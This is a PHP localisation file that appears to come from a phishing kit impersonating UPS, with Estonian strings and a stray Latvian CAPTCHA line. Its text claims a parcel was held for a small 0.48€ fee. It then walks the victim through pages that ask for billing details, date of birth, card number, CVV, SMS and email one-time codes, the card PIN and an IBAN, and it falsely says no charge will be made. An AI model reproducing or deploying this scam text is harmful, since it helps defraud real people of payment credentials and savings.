<?php
function lang($phrase){
	static $lang = array(

        "xlang" => "ET",
        "xcapt1" => "Lūdzu, pārbaudiet CAPTCHA lodziņā.",
        "xcapt2" => "Verifikācija",
        "xcapt3" => "Turpināt",
        "xfot1" => "See sait",
        "xfot2" => "Muud UPS veebisaidid",
        "xfot3" => "Ühendage meiega",
        "xfot4" => "Õiguslik alus",
        "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. All rights reserved. ",
        "xind1" => "Jälgi",
        "xind2" => "Jälgimisnumber",
        "xind3" => "Viga : Palun andke õige jälgimisnumber.",
        "xind4" => "Kas vajate abi tarne muutmisel?",
        "xind5" => "Tsitaat",
        "xind6" => "Saatmine",
        "xind7" => "Arve",
        "xind8" => "Saada abi",
        "xexp1" => "Katkestatud tarne",
        "xexp2" => "Jälgimine",
        "xexp3" => "Teie viimane tarne katkestati. Seda hoitakse praegu sorteerimiskeskuses.",
        "xexp4" => "Teile saadetud pakk ei vastanud märgitud kaalule ja teil palutakse maksta lisatasu, et tagada teie paki nõuetekohane kättetoimetamine.",
        "xexp5" => "Tasu on 0.48€.",
        "xexp6" => "Maksmiseks klõpsake palun alloleval nupul",
        'xexp7' => "Pay",
        "xexp8" => "Kui tasu on makstud, saadetakse teie pakk võimalikult kiiresti postiaadressile.",
        "xexp9" => "Kui tasu ei ole tasutud 48 tunni jooksul, saadetakse pakk tagasi saatjale.",
        "xexp10" => "Track by Reference Number",
        "xexp11" => "Import jälgimisnumbrid",
        "xexp12" => "Muud jälgimisteenused",
        "xinfz1" => "Kinnitage oma arveldusandmed",
        "xinfz10" => "Sünniaeg",
        "xinfz2" => "Täielik nimi",
        "xinfz3" => "Riik",
        "xinfz4" => "Linn",
        "xinfz5" => "aadress",
        "xinfz6" => "Telefon",
        "xinfz7" => "Postiindeks",
        "xinfz8" => "Viga : Kõik andmed on nõutavad",
        "xinfz9" => "Kinnita",
        "xpay1" => "Makseandmed",
        "xpay2" => "Lugupeetud klient, kontrollige oma makseandmeid õigesti ja sobitage oma kaardiandmed lõpuni",
        "xpay3" => "Nimi kaardil",
        "xpay4" => "Kaardi number",
        "xpay5" => "aegumiskuupäev",
        "xpay6" => "Turvakood CVV (3 numbrit)",
        "xpay7" => "Viga : Kõik andmed on nõutavad",
        "xpay8" => "Kinnita",
        "xsms1" => "Verifitseerimine",
        "xsms2" => "Saatsime teie numbrile kinnituskoodi.",
        "xsms3" => "OTP-kood",
        "xsms4" => "Viga : Vale otp-kood.",
        "xsms5" => "See samm on vajalik teie makseprotsessi turvaliseks lõpuleviimiseks.",
        "xsms6" => "UPS teostab teie kaardi kontrollimiseks ajutise autentimise. See on ainult autoriseerimine ja mitte tasu.",
        "xsms7" => "Kinnita",
        "xconf1" => "Kohaletoimetamise jätkamine",
        "xconf2" => "Lisatasude tasumine on arvesse võetud.",
        "xconf3" => "Teie pakk peaks saabuma järgmise 24 tunni jooksul.",
        "xconf4" => "Kinnita",
        "xpin1" => "Verifitseerimine",
        "xpin2" => "Sisestage oma pangakaardi PIN-kood",
        "xpin3" => "PIN-kood",
        "xpin4" => "(4 numbrit)",
        "xpin5" => "See samm on vajalik teie makseprotsessi turvaliseks lõpuleviimiseks.",
        "xpin6" => "UPS teostab teie kaardi kontrollimiseks ajutise kontrolli. See on ainult autoriseerimine ja mitte tasu.",
        "xpin7" => "Kinnita",
        "xmail1" => "Verifitseerimine",
        "xmail2" => "Oleme saatnud kinnituskoodi teie e-posti aadressile",
        "xmail3" => "E-posti kood",
        "xmail4" => "(6 numbrit)",
        "xmail5" => "See samm on vajalik teie makseprotsessi turvaliseks lõpuleviimiseks.",
        "xmail6" => "UPS teostab teie kaardi kontrollimiseks ajutise kontrolli. See on ainult autoriseerimine ja mitte tasu.",
        "xmail7" => "Kinnita",
        "xiban1" => "kontrollimine",
        "xiban2" => "Palun sisestage oma IBAN, et makse lõpule viia",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "See samm on vajalik makseprotsessi turvaliseks lõpuleviimiseks.",
        "xiban6" => "UPS teostab teie kaardi kontrollimiseks ajutise kontrolli. See on ainult autoriseerimine ja EI ole tasu.",
        "xiban7" => "Kinnita"
	);	
	
	return $lang[$phrase];
}
 ?>